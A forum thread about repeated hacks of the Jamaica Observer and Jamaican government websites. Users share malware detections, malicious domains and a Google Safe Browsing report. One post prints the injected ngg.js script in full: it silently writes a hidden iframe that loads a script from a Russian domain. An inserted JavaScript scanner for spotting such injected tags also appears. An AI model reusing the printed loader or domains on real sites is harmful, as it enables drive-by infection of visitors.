Weird. My mouse and firefox seems to be messed up after visiting the Observer webpage. Every link now opens in a new window in firefox, instead of the same window. My scroll window now acts as a left click. Using Opera right now instead.
If my computer got messed up from Observer's website being hacked, I am going to be peeved at their webmaster for not keeping the website more secure.
psilos
July 23, 2008, 06:55 AM
Thank God for Kaspersky. That site is so hacked and full of malicious script. I thought I was going to be the first one to post but I missed it by an hour. Whappen you guys don't sleep :). Has someone called to inform them because who knows what that malware does to your machine.
detected: virus Net-Worm.JS.Aspxor.a URL:http://www.jvke.ru/ngg.js
kirkcaldyj
July 23, 2008, 07:19 AM
Well as title states.
http://img396.imageshack.us/img396/2469/observerhack2qw9.jpg (http://imageshack.us)
http://img396.imageshack.us/img396/2469/observerhack2qw9.8379bb94b3.jpg (http://g.imageshack.us/g.php?h=396&i=observerhack2qw9.jpg)
http://img73.imageshack.us/img73/6428/observerhackedfq1.jpg (http://imageshack.us)
http://img73.imageshack.us/img73/6428/observerhackedfq1.0da6380298.jpg (http://g.imageshack.us/g.php?h=73&i=observerhackedfq1.jpg)
pogi_2nr
July 23, 2008, 08:19 AM
just the images and related articles? meh its not so bad
psybuck2002us
July 23, 2008, 08:33 AM
just the images and related articles? meh its not so bad
Hacked nonetheless. From what I am seeing, this is obviously sql injection. These Netdevilz guys are pros. They hacked the photobucket and ICANN sites in the past. And they are Turkish. I wonder what they get hacking a site like The Observer.
Billerg
July 23, 2008, 08:40 AM
i wonder when we get so big to now be the target of hackers ??:eusa_thin:eusa_thin. This should be a warning to other local websites that security should be high on their agenda.
Utech22
July 23, 2008, 08:43 AM
I wonder why they would do that? ? ?
madcats99
July 23, 2008, 08:45 AM
Hacked nonetheless. From what I am seeing, this is obviously sql injection. These Netdevilz guys are pros. They hacked the photobucket and ICANN sites in the past. And they are Turkish. I wonder what they get hacking a site like The Observer.
Because they can.. Whether any harm was done or not. being hacked is a breach of security, shows up observer
up to time of this post still there
Chris
July 23, 2008, 09:07 AM
I wouldn't click any of those links they have in the related articles section as they point to some java scripts and we don't know what they'll do on your machine.
hv_thugg
July 23, 2008, 09:21 AM
LoL hackers are loose never thought i would see these things so rampant in ja.
ramesh
July 23, 2008, 01:52 PM
Well, Google has now blocked me from going to the Observer website....
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.jamaicaobserver.com/
Reported Attack Site!
This web site at www.jamaicaobserver.com has been reported as an attack site and has been blocked based on your security preferences.
Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.
Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
Safe Browsing
Diagnostic page for www.jamaicaobserver.com/
What is the current listing status for www.jamaicaobserver.com/?
Site is listed as suspicious - visiting this web site may harm your computer.
What happened when Google visited this site?
Of the 91 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/23/2008, and the last time suspicious content was found on this site was on 07/23/2008.
Malicious software is hosted on 3 domain(s), including 78.109.30.0, gb53.ru, jvke.ru.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, www.jamaicaobserver.com/ did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
* Return to the previous page.
* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Arch_Angel
July 23, 2008, 01:56 PM
For those interested, this was the contents of the ngg.js javascript file the hacker tried to load on the Observer page:
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("vrcgoo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "vrcgoo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://4cnw.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}
Seems it tries to set a cookie on persons computers and also load a CGI script.
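An added example, not part of the post above or of anyone's code in this thread: a static check a site owner could run over a page's HTML, or over a fetched script, for the two markers discussed here, a script tag loaded from a host outside an allowlist and a zero-size iframe written with unquoted attributes like the one in ngg.js. The hostnames, the allowlist and the function names are constructed assumptions.

```javascript
// Added example. Every hostname and markup sample below is constructed.
const PAGE_URL = "https://news.site.example/articles/story.asp";
const ALLOWED_HOSTS = ["news.site.example", "partner.example"];

// Constructed page: two legitimate scripts, one injected script, one normal embed.
const SAMPLE_PAGE = [
  "<html><head>",
  '<script src="/js/menu.js"></script>',
  '<script type="text/javascript" src="https://widgets.partner.example/share.js"></script>',
  "</head><body><h1>Related Links</h1>",
  "<script src=http://static.injected.example/ngg.js></script>",
  '<iframe src="https://video.partner.example/embed/1" width="560" height="315"></iframe>',
  "</body></html>",
].join("\n");

// Constructed script body shaped like the document.write() call quoted in the thread.
const SAMPLE_SCRIPT =
  'document.write("<iframe src=http://gate.injected.example/cgi-bin/index.cgi?ad ' +
  'width=0 height=0 frameborder=0></iframe>");';

// Parse one tag's attributes, accepting "quoted", 'quoted' and unquoted values.
function parseAttrs(tagText) {
  const attrs = {};
  const body = tagText.replace(/^<\s*[\w:-]+/, "").replace(/\/?>$/, "");
  const re = /([a-zA-Z_:][\w:.-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Resolve src against the page URL so relative and //host paths are handled.
function resolveHost(src, pageUrl) {
  try {
    return new URL(src, pageUrl).hostname.toLowerCase();
  } catch (e) {
    return null; // src could not be parsed as a URL
  }
}

// A host is allowed if it equals an allowlist entry or is a subdomain of one.
function hostAllowed(host, allowedHosts) {
  return allowedHosts.some((a) => host === a || host.endsWith("." + a));
}

// Zero or one pixel wide/high, or hidden through inline style.
function isHiddenFrame(attrs) {
  const tiny = (v) => v !== undefined && parseInt(v, 10) <= 1;
  return (
    tiny(attrs.width) ||
    tiny(attrs.height) ||
    /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || "")
  );
}

// Scan HTML or script text and return one finding per suspicious tag.
// Inline scripts have no src, but their bodies are scanned as text, so an
// iframe emitted through document.write() is still seen.
function scanMarkup(text, pageUrl, allowedHosts) {
  const findings = [];
  const tagRe = /<\s*(script|iframe)\b[^>]*>/gi;
  for (const m of text.matchAll(tagRe)) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttrs(m[0]);
    if (!attrs.src) continue;
    const host = resolveHost(attrs.src, pageUrl);
    if (host !== null && hostAllowed(host, allowedHosts)) continue;
    let kind;
    if (host === null) kind = "unparseable-src";
    else if (tag === "script") kind = "third-party-script";
    else kind = isHiddenFrame(attrs) ? "hidden-iframe" : "third-party-iframe";
    findings.push({ kind, host, tag: m[0] });
  }
  return findings;
}

console.log(scanMarkup(SAMPLE_PAGE, PAGE_URL, ALLOWED_HOSTS));
console.log(scanMarkup(SAMPLE_SCRIPT, PAGE_URL, ALLOWED_HOSTS));
```

Running it on a schedule against the site's own published pages, with the allowlist kept to hosts the webmaster actually uses, surfaces an injected tag before a browser blocklist does.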
matronyx
July 23, 2008, 04:29 PM
scripts for the win !!!
or not ...in this case :eusa_doh:
I dunno but the bright side of things is that you are kept on your toes with regards to security (well should be).
Arch_Angel
July 23, 2008, 05:14 PM
scripts for the win !!!
or not ...in this case :eusa_doh:
I dunno but the bright side of things is that you are kept on your toes with regards to security (well should be).
Well, can't do much if you visit your favourite and trusted site (like the Observer) and then find out it's hacked and that the hacker uses a vulnerability in your browser that he has not published, that loads a script that does damage to your pc.
No matter how much toes you stay on, can't do much in that regards.
matronyx
July 23, 2008, 07:00 PM
Well, can't do much if you visit your favourite and trusted site (like the Observer) and then find out it's hacked and that the hacker uses a vulnerability in your browser that he has not published, that loads a script that does damage to your pc.
No matter how much toes you stay on, can't do much in that regards.
.... disable scripts ...or turn on prompting .... :sold:
Always a way man...
Arch_Angel
July 23, 2008, 08:31 PM
.... disable scripts ...or turn on prompting .... :sold:
Always a way man...
tronyx, disabling javascript would be like surfing the web in text. Just using most of this forum functionality requires javascript. LOTS of sites require javascript. Do you surf with javascript disabled?
The NoScript extension for firefox as BCK pointed out would be the safer way to avoid sites that get hacked and insert javascript from 3rd party sites. I might just look into installing it, since 1 of my favorite sites are getting hacked more than once in a short time. :eusa_wall
matronyx
July 23, 2008, 08:50 PM
No no ....im not saying you should, i did also mention enabling the prompt so you see exactly what you're allowing to take refuge on your pc.
See, majority of users say "Yes" to everything that pops up because they just "wanna get on with it", but the handful, that take precautions fare better more while.
There is also a feature in browsers where it can prompt you once the first time you visit a site.
Say you went to observer and accepted the cert and javascripts a few weeks back, then this new malicious code prompted you out of the blue today, spending that half minute more to examine whats what can make a difference.
Just...an... idea...
Arch_Angel
July 23, 2008, 09:00 PM
No no ....im not saying you should, i did also mention enabling the prompt so you see exactly what you're allowing to take refuge on your pc.
See, majority of users say "Yes" to everything that pops up because they just "wanna get on with it", but the handful, that take precautions fare better more while.
There is also a feature in browsers where it can prompt you once the first time you visit a site.
Say you went to observer and accepted the cert and javascripts a few weeks back, then this new malicious code prompted you out of the blue today, spending that half minute more to examine whats what can make a difference.
Just...an... idea...
What prompt you talking tron? Firefox doesn't prompt you if you want to allow a website to use javascript. Or are you talking about another browser? :eusa_thin
tech_guru
July 23, 2008, 09:18 PM
Interesting script seems to exclude Russian and Chinese users..
Any word from observer officials?
Wonder whats here.. h..p://4cnw.ru/cgi-bin/index.cgi?ad
Technoboy
July 24, 2008, 08:43 AM
The Jamaica Observer seems to have been hacked...again.
Doesn't seem to have done a whole lot of defacing from what I can see (or maybe it was in the middle of doing the defacing) but getting errors on the cartoon page. And also the Related Links script at the bottom of each news article is showing the following text:
hacked by ADANALI - GeCeCi ( TurkStorm - NetDevilz )
The hacker seems to be trying to get the following javascript to load on the site:
http://www.jvke.ru/ngg.js
Does the Observer webmaster need someone to look over their ASP scripts for potential vulnerabilities? Because this is getting too frequent.
lol send in your resume. They seem to need the help. ;)
icuucme
July 24, 2008, 08:49 AM
The website is now up
Arch_Angel
July 24, 2008, 09:06 AM
The website is now up
With FF3 the damage is much greater, since FF3 now blocks users from accessing the site, because Google has marked the site as dangerous.
Hope the webmasters have went ahead and cleared the issue with Google. Need to login to Webmaster Tools https://www.google.com/webmasters/tools and send the site in for reconsideration, so they can evaluate the site again.
Otherwise, Observer might be blocked for a good while. :(
psilos
August 8, 2008, 07:31 AM
The Jamaica Observer's webpage was hacked again. Please stay AWAY!!!!
The site attempts to load snapview.ocx then downloads rondll32.exe to a temporary location:C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\IX6UY2KZ\rondll32[1].exe
Trojan program: Backdoor.Win32.Small.flb
hv_thugg
August 8, 2008, 08:35 AM
The Jamaica Observer's webpage was hacked again. Please stay AWAY!!!!
The site attempts to download a load snapview.ocx then downloads rondll32.ext to a temporary location:C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\IX6UY2KZ\rondll32[1].exe
Trojan program: Backdoor.Win32.Small.flb
lol whats there problem with this site i wonder what did they do to those persons?
fire21
August 8, 2008, 09:09 AM
The Jamaica Observer's webpage was hacked again. Please stay AWAY!!!!
The site attempts to load snapview.ocx then downloads rondll32.exe to a temporary location:C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\IX6UY2KZ\rondll32[1].exe
Trojan program: Backdoor.Win32.Small.flb
This just shows up how unsecured some of our websites are. I wonder if the banking websites are fretting...:icon_eek:
silentburn
August 8, 2008, 09:49 AM
lol whats there problem with this site i wonder what did they do to those persons?
Maybe its just one of the easier sites to hack and plus the site has consistent traffic so I guess it makes a very attractive victim. Or maybe someone just has a bone to pick with the Observer and wants to make life real difficult for the company.
Bawn_Jamaican
August 8, 2008, 10:19 AM
Maybe its just one of the easier sites to hack and plus the site has consistent traffic so I guess it makes a very attractive victim. Or maybe someone just has a bone to pick with the Observer and wants to make life real difficult for the company.
Well i guess this is where those who participated in the Computer Forensic course at Utech will come in handy
Arch_Angel
August 9, 2008, 03:48 AM
Looks like Observer was hacked again this morning. This is crazy and absolutely ridiculous.
Hack me once, shame on you, hack me twice, shame on me. Hack me 3 times... :eusa_wall
king
August 9, 2008, 08:57 AM
The Observer has been advertising for an IT Manager over the past few weeks. I wonder if the hacks are coming from Jamaica? hmmmm
barrettrs
August 9, 2008, 11:33 AM
Well Firefox 3.0 had Jamaica Observer's site blocked for about a week and every time I tried to check it I got either an error message or a security vulnerability prompt about the site. The only thing I can say is that sometimes you get what you paid for still but as KING said they are looking for an IT Manager so that could be but one of the sites' many problems why they are being attacked this aggressively.
nder
October 2, 2008, 09:50 AM
What's the deal with the JamaicaObserver Website??
http://i5.photobucket.com/albums/y154/nder_jm/jamaicaobserver.jpg
zRo ToLeRaNcE
October 2, 2008, 10:10 AM
Same thing that happened before.
One or more of their pages were probably compromised and Google picked up on it.
The entire site wud then be initially blocked.
Arch_Angel
April 24, 2009, 07:14 AM
It looks like Observer has been hit, one...more...time.
Particularly on this web page: http://www.jamaicaobserver.com/magazines/Business/html/20090423T030000-0500_150057_OBS_CARLOS_SLIM_HAS_NOT_ACQUIRED_FLOW_ .asp
It is loading a flash file from a site bin.clearspring.com. Site is registered by someone in China. Not sure what the flash file is doing but hope it is not using a flash exploit.
Billerg
April 24, 2009, 08:30 AM
darn it :eusa_wall i just read that article prior to coming to TJ... oops. Gonna get myself fully scanned
madcats99
April 24, 2009, 08:57 AM
It looks like Observer has been hit, one...more...time.
Particularly on this web page: http://www.jamaicaobserver.com/magazines/Business/html/20090423T030000-0500_150057_OBS_CARLOS_SLIM_HAS_NOT_ACQUIRED_FLOW_ .asp
It is loading a flash file from a site bin.clearspring.com. Site is registered by someone in China. Not sure what the flash file is doing but hope it is not using a flash exploit.
I really dont get what that flash file is doing either... :eusa_wall
But observer seems to be easy target
ramesh
April 24, 2009, 09:00 AM
Clearspring is a site that creates widgets. They make the widget that you see on most sites beside the "Share this" sign.
Arch_Angel
April 24, 2009, 09:25 AM
Clearspring is a site that creates widgets. They make the widget that you see on most sites beside the "Share this" sign.
Ahh gotcha. Found the flash file within the javascript file from the addthis.com service that is owned by clearspring.
I don't know if it supposed to be apart of the Share This feature because the script doesn't use flash.
I just realized I did a whois look up on the wrong domain. It looked up clearsping.com (without the R in spring) instead of clearspring.com. :eusa_wall
Apart from the odd flash file embedded in the page directly from clearspring.com site (instead of addthis.com) and the hugely out of portioned picture on that article page, the page is ok.
Seems very fishy to me. :eusa_thin
ramesh
April 24, 2009, 10:39 AM
If you open the picture on another tab you will see it proportioned properly. It looks like an sizing error on the site's part
Arch_Angel
April 24, 2009, 12:15 PM
If you open the picture on another tab you will see it proportioned properly. It looks like an sizing error on the site's part
I know ramesh, but if it was just a large oversized picture, I wouldn't have made an alarm. But seeing a hidden flash file embedded from a 3rd party site that seems to have no place on this site, raised suspicions for me.
Anyways, I finally got in contact with the observer webmaster and he fixed it.
kirkcaldyj
January 27, 2010, 05:36 AM
Now which Idiot hacked this site for what purpose?
http://www.rada.gov.jm/rada_library.php
Now I need infor and cannot get it....Idle people seriously
danthony
January 27, 2010, 05:59 AM
lol. oh boy.......... look like them nuh realise!
grim386
January 27, 2010, 07:34 AM
I was just gonna ask what the hell you talking bout then i realize that noscript disable the hacked by Pop crap
dwightmckie
January 27, 2010, 07:59 AM
idiot thing that.......
kirkcaldyj
January 27, 2010, 08:25 AM
Reported to them thru email already, hope they get it back up
mrwormp
January 27, 2010, 08:26 AM
oh well let's see what will happen
shola
January 27, 2010, 09:17 AM
heights of almshouse!!!
pops is an ***, i hope is ego is massaged by sabotaging rada's and i stress RADA's website.
Skele Drew
January 27, 2010, 09:42 AM
I was just gonna ask what the hell you talking bout then i realize that noscript disable the hacked by Pop crap
Firefox + Noscript (and ABP and Platypus) FTW!
Same here. At least he (she :eusa_shif?) didn't destroy anything. Well hopefully not :eusa_pray.
g2cris
January 27, 2010, 10:05 AM
He could have sent them an email regarding the site security. Poor RADA, trying to help farmers, most of who don't have access to Internet.
WHY????????????????????
POPS want a kick.
jackal
January 27, 2010, 05:50 PM
.................................................. ....................
duster
January 28, 2010, 04:28 AM
Now which Idiot hacked this site for what purpose?
http://www.rada.gov.jm/rada_library.php
Now I need infor and cannot get it....Idle people seriously
how you find out sey it hacked?:eusa_thin
kirkcaldyj
January 28, 2010, 07:58 AM
how you find out sey it hacked?:eusa_thin
I am doing farming, information is contained on the online library service for RADA that i want to get...its called SURFING THE WEB...
Skele Drew
January 28, 2010, 03:16 PM
He could have sent them an email regarding the site security. Poor RADA, trying to help farmers, most of who don't have access to Internet.
WHY????????????????????
POPS want a kick.
Not condoning what he did, but would they've fixed it if he had sent them an email?
Nastrodamus
January 28, 2010, 04:21 PM
I am doing farming, information is contained on the online library service for RADA that i want to get...its called SURFING THE WEB...
lol......DWL... ..
Woi... Anyways.
Hey, I was think that maybe we can do an Agriculture related site, seeing that the region needs it at the moment what say you?
jackal
January 28, 2010, 06:24 PM
.................................................. ....................
Wolfsburg
January 28, 2010, 07:15 PM
LOL thats funny. I mean who hacks an agricultural website?
Arch_Angel
January 28, 2010, 08:40 PM
LOL thats funny. I mean who hacks an agricultural website?
Who cares what the website is about? It's a government website, somebody might care about it, so hack it. Another website hacked, and it goes on your resume.
kknight
January 29, 2010, 03:30 PM
Some of these sites are probably run on NT4 servers. I came across one once and was wondering why they were exposing that OS to the internet.
duster
January 30, 2010, 05:40 AM
Some of these sites are probably run on NT4 servers. I came across one once and was wondering why they were exposing that OS to the internet.
lol this cannot be true ... Windows NT:D
NeGatiVe
January 31, 2010, 07:02 PM
So, the 2 sites I need access to tonight are down;
http://www.mns.org.jm/ Min of National Security
http://www.jcf.gov.jm/ JCF
http://img707.imageshack.us/img707/5286/mns.png (http://img707.imageshack.us/i/mns.png/)
You guys need to come together, register a company and start handing out flyers / placing an ad in the paper / email the website@hackedjamaicancompanyoftheday.jm advertising Security Solutions / server hardening / server maintenance... whatever...